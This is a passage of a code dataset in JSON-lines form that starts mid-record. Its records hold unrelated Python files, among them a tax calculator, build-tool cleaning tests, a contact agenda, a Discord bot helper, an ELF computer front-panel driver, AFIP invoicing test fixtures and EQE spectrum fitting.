wage_tax_val > 80000:\n rate = 0.45\n qcd = 13505\n elif wage_tax_val >= 55000:\n rate = 0.35\n qcd = 5505\n elif wage_tax_val >= 35000:\n rate = 0.3\n qcd = 2755\n elif wage_tax_val >= 9000:\n rate = 0.25\n qcd = 1005\n elif wage_tax_val >= 4500:\n rate = 0.2\n qcd = 555\n elif wage_tax_val >= 
1500:\n rate = 0.1\n qcd = 105\n else:\n rate = 0.03\n qcd = 0\n\n tax = wage_tax_val * rate - qcd\n if tax <= 0:\n return wage - wage * (0.08 + 0.02 + 0.005 + 0.06) \n else:\n return wage - tax - wage * (0.08 + 0.02 + 0.005 + 0.06) \n\nfor k in list:\n print(k+':'+format(getPostTaxWage(dict[k]), \".2f\"))\n","sub_path":"better_calculator.py","file_name":"better_calculator.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"446800839","text":"import os\nimport py\n\ndef test_clean_build_dir(qibuild_action):\n world_proj = qibuild_action.add_test_project(\"world\")\n qibuild_action(\"configure\", \"world\")\n qibuild_action(\"clean\", \"world\")\n assert os.path.exists(world_proj.build_directory)\n qibuild_action(\"clean\", \"-f\", \"world\")\n assert not os.path.exists(world_proj.build_directory)\n\ndef test_only_clean_one_build_dir(qibuild_action, toolchains):\n build_worktree = qibuild_action.build_worktree\n qibuild_action.add_test_project(\"world\")\n world_proj = build_worktree.get_build_project(\"world\")\n toolchains.create(\"foo\")\n qibuild_action(\"configure\", \"world\")\n qibuild_action(\"configure\", \"-c\", \"foo\", \"world\")\n\n qibuild_action(\"clean\", \"-f\", \"-c\", \"foo\", \"-a\")\n assert os.path.exists(world_proj.build_directory)\n build_worktree.set_active_config(\"foo\")\n assert not os.path.exists(world_proj.build_directory)\n\ndef test_cleaning_all_build_dirs(qibuild_action, toolchains):\n build_worktree = qibuild_action.build_worktree\n build_config = build_worktree.build_config\n world_proj = qibuild_action.add_test_project(\"world\")\n toolchains.create(\"foo\")\n qibuild_action(\"configure\", \"world\")\n qibuild_action(\"configure\", \"-c\", \"foo\", \"world\")\n qibuild_action(\"configure\", \"--release\", \"-c\", \"foo\", \"world\")\n\n qibuild_action(\"clean\", \"-fz\", \"world\")\n assert not os.path.exists(world_proj.build_directory)\n build_worktree.set_active_config(\"foo\")\n assert not os.path.exists(world_proj.build_directory)\n build_config.build_type = \"Release\"\n assert not os.path.exists(world_proj.build_directory)\n\n\ndef test_clean_profiles(qibuild_action, toolchains, interact):\n build_worktree = qibuild_action.build_worktree\n build_worktree.configure_build_profile(\"a\", [(\"A\", \"ON\")])\n build_worktree.configure_build_profile(\"b\", [(\"B\", \"ON\")])\n toolchains.create(\"foo\")\n world_proj = qibuild_action.add_test_project(\"world\")\n # pylint: disable-msg=E1101\n world_path = py.path.local(world_proj.path)\n build_foo_a = world_path.ensure(\"build-foo-a\", dir=True)\n build_foo_b = world_path.ensure(\"build-foo-b\", dir=True)\n build_foo_a_b = world_path.ensure(\"build-foo-a-b\", dir=True)\n build_foo_c = world_path.ensure(\"build-foo-c\", dir=True)\n qibuild_action(\"clean\", \"-z\", \"--all\", \"--force\")\n assert build_foo_a.check(dir=False)\n assert build_foo_b.check(dir=False)\n assert build_foo_a_b.check(dir=False)\n assert build_foo_c.check(dir=True)\n interact.answers = [True]\n qibuild_action(\"clean\", \"-x\", \"--all\", \"--force\")\n assert build_foo_c.check(dir=False)\n","sub_path":"python/qibuild/test/test_qibuild_clean.py","file_name":"test_qibuild_clean.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"581681034","text":"# -*- coding: utf-8 -*-\n#Se debera generar un sistema que mantenga en memoria datos de una 
agenda.\n# - El programa mostrara las opciones> agregar, editar, borrar, mostrar y salir\n# agregar, agenda un contacto (email, telefono, nombre, domicilio, edad y dni)\n# editar, permite modificar cualquiera de los contactos seleccionando su email.\n# borrar, elimina un contacto.\n\nfrom time import sleep\n\n\"\"\"\n muestro el menú de la agenda de contactos con las opciones\n\"\"\"\ndef mostrarMenu():\n print(\"*****************************\")\n print(\"*** Agenda de Contactos *****\")\n print(\"*****************************\")\n print(\" \")\n print(\"OPCIONES\")\n print(\" --> Agregar (1) \")\n print(\" --> Editar (2) \")\n print(\" --> Borrar (3) \")\n print(\" --> Mostrar (4) \")\n print(\" --> Salir (5) \")\n print(\" \")\n return int(input(\"Ingrese alguna opción: \"))\n\n\"\"\"\n retorno un diccionario de persona cargado\n\"\"\"\ndef cargarPersona():\n dicPersona = {}\n print(\" \")\n dicPersona[\"email\"] = raw_input(\"Ingrese Email: \")\n dicPersona[\"telefono\"] = raw_input(\"Ingrese Telefono: \")\n dicPersona[\"nombre\"] = raw_input(\"Ingrese Nombre: \")\n dicPersona[\"domicilio\"] = raw_input(\"Ingrese Domicilio: \")\n dicPersona[\"edad\"] = raw_input(\"Ingrese Edad: \")\n dicPersona[\"dni\"] = raw_input(\"Ingrese DNI: \")\n return dicPersona\n\n\"\"\"\n muestro los contactos contenidos dentro de la lista\n\"\"\"\ndef mostrarContactos(listaAgenda):\n print(\" \")\n print(\"Contactos Disponibles \" + str(len(listaAgenda)))\n #recorre la lista\n for contacto in listaAgenda:\n print(\"Nombre: \" + contacto[\"nombre\"] + \" Email: \" + contacto[\"email\"])\n\n\nif __name__ == \"__main__\":\n flagSalida = False\n listaAgenda = []\n dicPersona = {}\n\n while(flagSalida==False):\n opciones = mostrarMenu()\n #agregar\n if opciones == 1:\n dicPersona = cargarPersona()\n listaAgenda.append(dicPersona)\n #editar\n elif opciones == 2:\n mostrarContactos(listaAgenda)\n print(\" \")\n email = raw_input(\"Ingrese un email: \")\n\n for contactos in listaAgenda:\n if email in contactos[\"email\"]:\n contactos = cargarPersona()\n else:\n print(\"No existe el email ingresado.\")\n #borrar\n elif opciones == 3:\n mostrarContactos(listaAgenda)\n print(\" \")\n email = raw_input(\"Ingrese un email: \")\n\n for contactos in listaAgenda:\n if email in contactos[\"email\"]:\n listaAgenda.remove(contactos)\n else:\n print(\"No existe el email ingresado.\")\n #mostrar\n elif opciones == 4:\n mostrarContactos(listaAgenda)\n sleep(2)\n else:\n flagSalida = True\n","sub_path":"2.0-tipos-de-datos/ejercicios_alumnos/Zardain-Sergio/ej05.py","file_name":"ej05.py","file_ext":"py","file_size_in_byte":3046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"100989897","text":"import os\nimport json\nimport time\nimport hashlib\nimport discord\nfrom discord.ext import commands\nfrom gtts import gTTS\nfrom configobj import ConfigObj\n\noptions = ConfigObj('config/options.ini')\nwith open('../manifest.json') as j: manifest = json.load(j)\n\ndef restrict_to_admin():\n def is_admin(ctx):\n perms = ctx.author.guild_permissions\n if perms.administrator == True:\n return True \n else:\n return False\n return commands.check(is_admin)\n\ndef restrict_to_owner():\n def is_owner(ctx):\n if ctx.author.id == 199312062164369408:\n return True \n else:\n return False\n return commands.check(is_owner)\n\ndef md5(string:str):\n m = hashlib.md5()\n m.update(string.encode('utf-8'))\n return m.hexdigest()\n\nclass CommandsManager:\n\n async def getall():\n commands = []\n for 
root, dirs, files in os.walk(\"commands/\"):\n if '__pycache__' in dirs:\n dirs.remove('__pycache__')\n for filename in files:\n if '.py' in str(filename):\n commands.append(str(filename).replace('.py',''))\n return commands\n \n async def load(bot):\n commands = await CommandsManager.getall()\n for command in commands:\n bot.load_extension('commands.{}'.format(command))\n print('{} commands were loaded.'.format(str(len(commands))))\n\n async def unload(bot):\n commands = await CommandsManager.getall()\n for command in commands:\n bot.unload_extension('commands.{}'.format(command))\n print('{} commands were unloaded.'.format(str(len(commands))))\n\n\nclass TTSManager:\n\n async def build(text:str, language='es'):\n if not TTSManager.exists(text,language):\n hashed = md5(text+language)\n speech = gTTS(text, lang=language)\n path = f'rsrc/tts/{hashed}.mp3'\n speech.save(path)\n return path\n\n def to_speech(text:str, language='es'):\n speech = gTTS(text, lang=language)\n return speech\n\n def exists(text:str,lang:str):\n hashed = md5(text+lang)\n check = os.path.isdir(f'rsrc/tts/{hashed}.mp3')\n if check: return True \n else: return False\n\n\n\n ","sub_path":"src/logic.py","file_name":"logic.py","file_ext":"py","file_size_in_byte":2256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"196261487","text":"class Solution(object):\n def zigzagLevelOrder(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[List[int]]\n \"\"\"\n result = []\n if root != None:\n result.append([root])\n while result != []:\n prev_level = result[-1]\n result_level = []\n for node in prev_level:\n if node.left != None:\n result_level.append(node.left)\n if node.right != None:\n result_level.append(node.right)\n if result_level != []:\n result.append(result_level)\n else:\n break\n final_result = []\n LTR = 1\n for row in result:\n if LTR:\n final_result.append([n.val for n in row])\n else:\n final_result.append([n.val for n in row[::-1]])\n LTR = 0 if LTR else 1\n return final_result\n\n\n\n\n\n\n\n","sub_path":"BinTreeZigZag.py","file_name":"BinTreeZigZag.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"170438019","text":"import os, sys,time\n\nbase_path = '/nokia/be_nmp/groups/msg_touch_wa/xulliang/'\ncd_path = 's40_ui/s40_msg/msg_platform/appls/'\n#cd_path = 's40_ui/time_mgmt/'\nsrc_path = 's40_sw'\n\ndef get_all_build_path(p):\n r = []\n f = os.listdir(p)\n for ele in f:\n path = os.path.join(p, ele)\n if os.path.isdir(path) and ele != src_path:\n r.append(ele)\n return r\n\ndef write_multi_path(p):\n open(\"/disk1/xulliang/quick_cd.txt\",\"w\").write(\",\".join((p,str(time.time()))))\n\ndef get_multi_path_log():\n if os.path.exists(\"/disk1/xulliang/quick_cd.txt\"): \n a = open(\"/disk1/xulliang/quick_cd.txt\",\"r\").readline()\n return a.strip().split(\",\")\n return [None,None]\n \ndef ret_path(cur_path, param):\n use_multibuild = \"no\" \n if param[0] == \"bdyes\":\n args = \"bd\"\n use_multibuild = \"yes\" \n else:\n args = param[0]\n\n #open(\"/disk1/xulliang/a.txt\", \"w\").write(use_multibuild)\n if cur_path.startswith(base_path):\n n = cur_path[len(base_path):].split(\"/\")\n if len(n) >= 1:\n proj_path = n[0]\n else:\n return base_path\n build_path = \"\"\n if len(n) > 1: # the current path include build path\n if n[1] != src_path:\n build_path = n[1]\n #open(\"/disk1/xulliang/a.txt\", \"w\").write(proj_path+build_path+use_multibuild)\n else: 
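            # cwd is the project root itself with no build/src segment, so stay put; the write() below is unreachable after the return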
\n return \".\"\n open(\"/disk1/xulliang/a.txt\", \"w\").write(\"return .\")\n\n if args.lower() == \"bd\":\n \"\"\" go to the build path of msg \"\"\"\n paths = get_all_build_path(os.path.join(base_path, proj_path))\n\n if build_path and use_multibuild == \"no\":\n #open(\"/disk1/xulliang/a.txt\", \"w\").write(os.path.join(base_path,proj_path,build_path,cd_path))\n return os.path.join(base_path,proj_path,build_path,cd_path)\n\n if paths and len(paths) == 1:\n return os.path.join(base_path,proj_path,paths[0],cd_path)\n else:#more than 1 build path here\n# print(\"bd, more than 1 build path\")\n p,t = get_multi_path_log()\n r = \".\"\n find = -1\n if p and t:\n for i in range(len(paths)):\n# print(time.time(), float(t), time.time()-float(t))\n if paths[i] == os.path.split(p)[1] and time.time() - float(t) < 10.0:\n find = i\n break\n if find > -1:\n if find == len(paths)-1:\n r = os.path.join(base_path,proj_path, paths[0]) \n else:\n r = os.path.join(base_path,proj_path, paths[find+1])\n else:\n r = os.path.join(base_path,proj_path, paths[0]) \n if r != \".\":\n write_multi_path(r)\n return os.path.join(r,cd_path)\n elif args.lower() == 'src':\n \"\"\" go to the src path of msg\"\"\"\n return os.path.join(base_path,proj_path,src_path,cd_path)\n elif args.lower() == 'proj':\n \"\"\"go to the project path\"\"\"\n return os.path.join(base_path,proj_path)\n\n return \".\"\n\ndef change_evo_path(cur_path, param):\n path_apps = \"resources/apps\"\n path_view = \"resources/view/evo/apps\"\n path_out = \"out\"\n path_yapas = \"yapas\"\n if cur_path.find(path_yapas) != -1:\n if param == \"apps\":\n return os.path.join(cur_path.split(path_yapas)[0], path_yapas, path_apps)\n elif param == \"view\":\n return os.path.join(cur_path.split(path_yapas)[0], path_yapas, path_view)\n elif param == \"out\":\n return os.path.join(cur_path.split(path_yapas)[0], path_yapas, path_out)\n return \".\"\n\nif __name__ == \"__main__\":\n if len(sys.argv) > 1:\n cur_path = os.getcwd()\n #open(\"/disk1/xulliang/a.txt\", \"w\").write(sys.argv[1])\n #print(ret_path(cur_path, sys.argv[1:]))\n print(change_evo_path(cur_path, sys.argv[1]))\n else:\n #open(\"/disk1/xulliang/a.txt\", \"w\").write(\"error\")\n print(base_path)\n","sub_path":"py/quick_cd.py","file_name":"quick_cd.py","file_ext":"py","file_size_in_byte":4104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"162304152","text":"from django.conf.urls import patterns, url\nfrom . 
import views\n\nurlpatterns = patterns('',\n\t\t\t\turl(r'^$', views.index, name='index'),\n\t\t\t\turl(r'^manual/$', views.manual, name='manual'),\n\t\t\t\turl(r'^delete_member/$', views.delete_member, name = 'delete_member'),\n\t\t\t\turl(r'^restore_member/$', views.restore_member, name = 'restore_member'),\n\t\t\t\t# url(r'^update_member/$', views.update_member, name = 'update_member'),\n\t\t\t\turl(r'^search_names/$', views.search_names, name='search_names'),\n\t\t\t\turl(r'^update_form/$', views.update_form, name='update_form'),\n\t\t\t\turl(r'^view_cert/$', views.view_cert, name='view_cert'),\n\t\t\t\turl(r'^trash/$', views.trash, name='trash'),\n\t\t\t\turl(r'^recycle_bin/$', views.recycle_bin, name='recycle_bin'),\n\t\t\t\turl(r'^messages/$', views.messages, name='messages'),\n\t\t\t)","sub_path":"django-manipulation/data_mining/list/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"123926277","text":"\"\"\"Helper functions, temporarily named this way.\"\"\"\nimport numpy as np\nimport sys\n\n\ndef getnodedata(self, nl_p=None):\n \"\"\"\n Get all data from all nodes listed in the input.\n\n Input is a nodelist_bn object.\n Output is a list of dictionaries.\n \"\"\"\n nodedata = []\n if not nl_p:\n nl_p = self.getnetnodes()\n\n nnodes = self.lengthnodelist(nl_p)\n for idx in range(nnodes):\n node_p = self.nthnode(nl_p, idx)\n nodenamestr = self.getnodename(node_p)\n nstates = self.getnodenumberstates(node_p)\n isdiscrete = self.getnodetype(node_p) != 1\n if isdiscrete:\n nodelevels = [self.getnodestatename(node_p, state=i)\n for i in np.arange(nstates)]\n expval = (None, None)\n else:\n nodelevels = self.getnodelevels(node_p)\n expval = self.getnodeexpectedvalue(node_p)\n prob_bn = self.getnodebeliefs(node_p)\n nodedata.append({'name': nodenamestr,\n 'discrete': isdiscrete,\n 'expval': expval,\n 'nstates': nstates,\n 'levels': nodelevels,\n 'probs': prob_bn})\n return nodedata\n\n\ndef ccharp(inpstr):\n \"\"\"Make sure input strings are c_char_p bytes objects.\"\"\"\n # https://stackoverflow.com/questions/23852311/different-behaviour-of-ctypes-c-char-p # noqa\n if sys.version_info < (3, 0) or 'bytes' in str(type(inpstr)):\n outstr = inpstr\n else:\n outstr = inpstr.encode('utf-8')\n return outstr\n","sub_path":"netica/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"364859328","text":"#!/usr/bin/env python3\n\"\"\"ELF/MC front panel program\"\"\"\nfrom enum import Enum, auto\nimport sys\nimport time\nimport keyboard\nimport elf\n\nclass Mode(Enum):\n \"\"\"Current control mode.\"\"\"\n CONTROL = auto()\n KEYBOARD = auto()\n\nCARD = elf.Elf()\n\nif sys.platform == 'win32':\n import msvcrt # pylint: disable=import-error\n getch = msvcrt.getch\n getche = msvcrt.getche\nelse:\n import termios # pylint: disable=import-error\n def __gen_ch_getter(echo):\n def __fun():\n fdesc = sys.stdin.fileno()\n oldattr = termios.tcgetattr(fdesc)\n newattr = oldattr[:]\n try:\n if echo:\n # disable ctrl character printing, otherwise, backspace will be printed as \"^?\"\n lflag = ~(termios.ICANON | termios.ECHOCTL)\n else:\n lflag = ~(termios.ICANON | termios.ECHO)\n newattr[3] &= lflag\n termios.tcsetattr(fdesc, termios.TCSADRAIN, newattr)\n char = sys.stdin.read(1)\n if echo and ord(char) == 127: # backspace\n # emulate backspace erasing\n # 
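                    # '\b \b' steps the cursor back, overwrites the echoed character with a space, then steps back again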
https://stackoverflow.com/a/47962872/404271\n sys.stdout.write('\\b \\b')\n finally:\n termios.tcsetattr(fdesc, termios.TCSADRAIN, oldattr)\n return char\n return __fun\n getch = __gen_ch_getter(False)\n getche = __gen_ch_getter(True)\n\ndef update_status(mode):\n \"\"\"Update status display line.\"\"\"\n print(f'\\rMode: {\"KEYBD\" if mode == Mode.KEYBOARD else CARD.mode:5} '\n f'Mem Protect: {\"ON\" if CARD.mem_protect else \"OFF\":3} '\n f'Data: {CARD.data:02X}', end='')\n\ndef press_input():\n \"\"\"Press the input key on the computer.\"\"\"\n CARD.ef4_n = True\n time.sleep(0.005)\n CARD.ef4_n = False\n\ndef load_program(bin_file):\n \"\"\"Load the contents of a binary file.\"\"\"\n with open(bin_file, 'rb') as file:\n byte = file.read(1)\n while byte:\n CARD.data = byte[0]\n press_input()\n byte = file.read(1)\n\ndef load_monitor():\n \"\"\"Load the MAX monitor and BIOS.\"\"\"\n CARD.mode = CARD.Mode.RESET\n CARD.mode = CARD.Mode.LOAD\n CARD.mem_protect = False\n load_program('bootstrap.bin')\n CARD.mode = CARD.Mode.RESET\n CARD.mode = CARD.Mode.RUN\n CARD.data = 0x80\n press_input()\n CARD.data = 0x00\n press_input()\n load_program('max_mon.bin')\n CARD.mode = CARD.Mode.RESET\n CARD.mode = CARD.Mode.RUN\n CARD.data = 0x84\n press_input()\n CARD.data = 0x00\n press_input()\n load_program('max_bios.bin')\n CARD.mode = CARD.Mode.RESET\n\ndef run_monitor():\n \"\"\"Reset the machine and run the monitor.\"\"\"\n CARD.mode = CARD.Mode.RESET\n CARD.mode = CARD.Mode.LOAD\n CARD.data = 0xC0\n press_input()\n CARD.data = 0x80\n press_input()\n CARD.data = 0x00\n press_input()\n CARD.mode = CARD.Mode.RESET\n CARD.mode = CARD.Mode.RUN\n\ndef on_key(key): #pylint: disable=too-many-branches\n \"\"\"Callback for when a keyboard key is pressed.\"\"\"\n if key in ('i', '\\n', ' '):\n CARD.ef4_n = True\n elif key == '0':\n CARD.data = (CARD.data << 4 | 0x0) & 0xff\n elif key == '1':\n CARD.data = (CARD.data << 4 | 0x1) & 0xff\n elif key == '2':\n CARD.data = (CARD.data << 4 | 0x2) & 0xff\n elif key == '3':\n CARD.data = (CARD.data << 4 | 0x3) & 0xff\n elif key == '4':\n CARD.data = (CARD.data << 4 | 0x4) & 0xff\n elif key == '5':\n CARD.data = (CARD.data << 4 | 0x5) & 0xff\n elif key == '6':\n CARD.data = (CARD.data << 4 | 0x6) & 0xff\n elif key == '7':\n CARD.data = (CARD.data << 4 | 0x7) & 0xff\n elif key == '8':\n CARD.data = (CARD.data << 4 | 0x8) & 0xff\n elif key == '9':\n CARD.data = (CARD.data << 4 | 0x9) & 0xff\n elif key == 'a':\n CARD.data = (CARD.data << 4 | 0xA) & 0xff\n elif key == 'b':\n CARD.data = (CARD.data << 4 | 0xB) & 0xff\n elif key == 'c':\n CARD.data = (CARD.data << 4 | 0xC) & 0xff\n elif key == 'd':\n CARD.data = (CARD.data << 4 | 0xD) & 0xff\n elif key == 'e':\n CARD.data = (CARD.data << 4 | 0xE) & 0xff\n elif key == 'f':\n CARD.data = (CARD.data << 4 | 0xF) & 0xff\n elif key == 'l':\n CARD.mode = CARD.Mode.LOAD\n elif key == 'r':\n CARD.mode = CARD.Mode.RESET\n elif key == 'g':\n CARD.mode = CARD.Mode.RUN\n elif key == 'w':\n CARD.mode = CARD.Mode.PAUSE\n elif key == 'p':\n CARD.mem_protect = not CARD.mem_protect\n elif key == 'z':\n load_monitor()\n elif key == 'm':\n run_monitor()\n\ndef on_release(_key):\n \"\"\"Callback when keyboard key is released.\"\"\"\n CARD.ef4_n = False\n CARD.stb_n = False\n\ndef run_card():\n \"\"\"Set up keyboard callbacks and respond to keys.\"\"\"\n done = False\n\n keyboard.on_release_key('i', on_release)\n keyboard.on_release_key('\\n', on_release)\n keyboard.on_release_key(' ', on_release)\n\n mode = Mode.CONTROL\n\n 
update_status(mode)\n\n while not done:\n char = getch().lower()\n if char == 'q':\n done = True\n else:\n if ord(char) == 0:\n if mode == Mode.CONTROL:\n mode = Mode.KEYBOARD\n else:\n mode = Mode.CONTROL\n else:\n if mode == Mode.KEYBOARD:\n CARD.data = ord(char)\n CARD.stb_n = True\n else:\n on_key(char)\n update_status(mode)\n\n print() # Print new line\n\nif __name__ == \"__main__\":\n run_card()\n","sub_path":"python/elf_fp.py","file_name":"elf_fp.py","file_ext":"py","file_size_in_byte":5639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"292957328","text":"# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n# Copyright 2010-2012 OpenStack Foundation\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport routes\nimport webob.exc\n\nfrom trove.common import cfg\nfrom trove.common import exception\nfrom trove.common import utils\nfrom trove.common import wsgi\nfrom trove.openstack.common import log as logging\nfrom trove.instance import models as inst_models\n\nCONF = cfg.CONF\nLOG = logging.getLogger(__name__)\n\nclass ServiceImageController(wsgi.Controller):\n \"\"\"Controller for service images functionality\"\"\"\n\n def show(self, req, tenant_id, id):\n \"\"\"Return a single flavor.\"\"\"\n LOG.info(\"Get service image %s detail.\"%id)\n context = req.environ[wsgi.CONTEXT_KEY]\n #self._validate_flavor_id(id)\n #flavor = models.Flavor(context=context, flavor_id=int(id))\n # Pass in the request to build accurate links.\n #return wsgi.Result(views.ServiceImageView(flavor, req).data(), 200)\n pass\n\n def index(self, req, tenant_id):\n \"\"\"Return all flavors.\"\"\"\n LOG.info(\"Get service images list.\")\n context = req.environ[wsgi.CONTEXT_KEY]\n #flavors = models.Flavors(context=context)\n #return wsgi.Result(views.View(flavors, req).data(), 200)\n db_info = inst_models.ServiceImage.find_all()\n images = []\n \n for _item in db_info:\n kv = {}\n kv['service_name'] = _item.service_name\n kv['image_id'] = _item.image_id\n kv['default'] = 'no'\n if _item.service_name==CONF.service_type:\n kv['default'] = 'yes' \n images.append(kv)\n\n ret = {'serviceimages': images}\n return wsgi.Result(ret, 202)\n\n","sub_path":"trove/patch/service_image/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"178116244","text":"import sys, os\n\n# HACK para que los modulos se importen correctamente\nsys.path.append(os.getcwd())\n\nfrom wsfe_suds import WSFEv1\nfrom wsfex_suds import WSFEX\nfrom wsaa_suds import WSAA\nimport pytz\n\n#cuit = 30711339740 # PLOT30710981295\n#cuit = 30712145028 # Mundo Press\n#cuit = 30712306544 # Eynes\ncuit = 30710981295 # E-MIPS Test\n\n# Funcion de creacion de la clase WSFE\ndef create_test_wsfev1():\n# wsaa = WSAA()\n# wsfev1 = WSFEv1(wsaa, cuit, \"https://servicios1.afip.gov.ar/wsfev1/service.asmx?wsdl\")\n\n\n cert = 
\"/home/skennedy/proyectos/afipws/certs/e-mips_test.crt\"\n key = \"/home/skennedy/proyectos/afipws/certs/privada.key\"\n #cert = \"/home/skennedy/proyectos/afipws/certs2014/PLOT/CERTIFICADOWSFE2014_66d9bd3bf64846c3.crt\"\n #key = \"/home/skennedy/proyectos/afipws/certs2014/PLOT/privada.key\"\n wsaaurl_homo = \"https://wsaahomo.afip.gov.ar/ws/services/LoginCms?wsdl\"\n wsaaurl_prod = \"https://wsaa.afip.gov.ar/ws/services/LoginCms?wsdl\"\n wsaa = WSAA(cert=cert, private_key=key, wsaaurl=wsaaurl_homo, service=\"wsfe\")\n\n wsfeurl_prod = \"https://servicios1.afip.gov.ar/wsfev1/service.asmx?wsdl\"\n wsfeurl_homo = \"https://wswhomo.afip.gov.ar/wsfev1/service.asmx?wsdl\" \n wsfev1 = WSFEv1(wsaa, cuit, wsfeurl=wsfeurl_homo)\n\n return wsfev1\n\n# Destruccion\ndef destroy_test_wsfev1():\n pass\n\n# Funcion de creacion de la clase WSFEX\ndef create_test_wsfex():\n cert = \"/home/skennedy/proyectos/afipws/certs/e-mips_test.crt\"\n key = \"/home/skennedy/proyectos/afipws/certs/privada.key\"\n tz = pytz.timezone('America/Argentina/Buenos_Aires') or pytz.utc\n\n wsaaurl_homo = \"https://wsaahomo.afip.gov.ar/ws/services/LoginCms?wsdl\"\n\n wsaa = WSAA(cert=cert, private_key=key, wsaaurl=wsaaurl_homo, service=\"wsfex\", tz=tz)\n wsaa.get_token_and_sign()\n wsfex = WSFEX(cuit, wsaa.token, wsaa.sign, \"https://wswhomo.afip.gov.ar/wsfexv1/service.asmx?wsdl\")\n return wsfex\n\n# Destruccion\ndef destroy_test_wsfex():\n pass\n\n# Function Argument para instanciar el objeto WSFE y tenerlo durante toda la sesion\ndef pytest_funcarg__wsfe(request):\n return request.cached_setup(\n setup=lambda: create_test_wsfe(),\n teardown=lambda val: destroy_test_wsfe(),\n scope=\"session\"\n )\n\ndef pytest_funcarg__wsfev1(request):\n return request.cached_setup(\n setup=lambda: create_test_wsfev1(),\n teardown=lambda val: destroy_test_wsfev1(),\n scope=\"session\"\n )\n\ndef pytest_funcarg__wsfex(request):\n return request.cached_setup(\n setup=lambda: create_test_wsfex(),\n teardown=lambda val: destroy_test_wsfex(),\n scope=\"session\"\n )\n","sub_path":"l10n_ar_wsfe/wsfetools/test_wsfe/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"527416500","text":"import math\n\nimport numpy as np\nfrom numpy import exp\nfrom scipy.interpolate import interp1d\n\nfrom source.compilation import compile_EQE\nfrom source.utils import R_squared\n\n\n# -----------------------------------------------------------------------------------------------------------\n\n# Function to calculate gaussian absorption\n\ndef calculate_gaussian_absorption(x, f, l, E, T):\n \"\"\"\n :param x: List of energy values [list]\n :param f: Oscillator strength [float]\n :param l: Reorganization Energy [float]\n :param E: Peak Energy [float]\n :param T: Temperature [float or int]\n :return: EQE value [float]\n \"\"\"\n\n # Define variables\n k = 8.617 * math.pow(10, -5) # [ev/K]\n\n return (f / (x * math.sqrt(4 * math.pi * l * T * k))) * exp(-(E + l - x) ** 2 / (4 * l * k * T))\n\n\n# -----------------------------------------------------------------------------------------------------------\n\n# Function to calculate gaussian absorption including disorder\n\ndef calculate_gaussian_disorder_absorption(x, f, l, E, sig, T):\n \"\"\"\n :param x: List of energy values [list]\n :param f: Oscillator strength [float]\n :param l: Reorganization Energy [float]\n :param E: Peak Energy [float]\n :param sig: Peak disorder [float]\n :param 
T: Temperature [float or int]\n :return: EQE value [float]\n \"\"\"\n\n # Define variables\n k = 8.617 * math.pow(10, -5) # [ev/K]\n\n return (f / (x * math.sqrt(2 * math.pi * (2 * l * T * k + sig ** 2))) * exp(\n -(E + l - x) ** 2 / (4 * l * k * T + 2 * sig ** 2)))\n\n\n# -----------------------------------------------------------------------------------------------------------\n\n# Function to calculate parameters for double peak fit\n\ndef calculate_combined_fit(eqe,\n stopE,\n best_vals_Opt,\n best_vals_CT,\n T,\n R2_Opt=None,\n R2_CT=None,\n include_disorder=False,\n bias=False,\n tolerance=0,\n range=1.05\n ):\n \"\"\"\n Function to compile combined fit for S1 and CT peak absorption after single peak fits\n :param eqe: EQE values [list]\n :param stopE: stop energy of fit [float]\n :param best_vals_Opt: Opt fit values [list]\n :param best_vals_CT: CT fit values [list]\n :param T: Temperature [float]\n :param R2_Opt: Opt fit R2 [float]\n :param R2_CT: CT fit R2 [float]\n :param include_disorder: boolean value to see whether to include disorder [bool]\n :param bias: bias fit below data [boolean]\n :param tolerance: tolerance accepted of fit above data [float]\n :param range: defines upper bound of R2 calculation [float]\n :return: result_dict : dictionary with fit results [dict]\n Dict keys:\n R2_Combined: R2 of sum of CT and Opt fit [float]\n R2_CT: R2 of CT fit [float]\n R2_Opt: R2 of Opt fit [float]\n R2_Average: average R2 of CT / Opt / Combined fit [float]\n Combined_Fit: sum of CT and Opt fit [list]\n Opt_fit: Opt fit values [list]\n CT_fit: CT fit values [list]\n Energy: Energy values [list]\n EQE: original EQE data [list]\n \"\"\"\n\n wave_data, energy_data, eqe_data, log_eqe_data = compile_EQE(eqe,\n min(eqe['Energy']),\n stopE * range, # Increase stop energy to expand fit!\n 1)\n # # Optional code to add interpolation to the data\n # int_func = interp1d(eqe['Energy'], eqe['EQE'])\n # energy_data = np.arange(min(eqe['Energy']), stopE * range, 1)\n # eqe_data = int_func(energy_data)\n\n if sum(best_vals_Opt) != 0 and sum(best_vals_CT) != 0:\n Opt_fit = 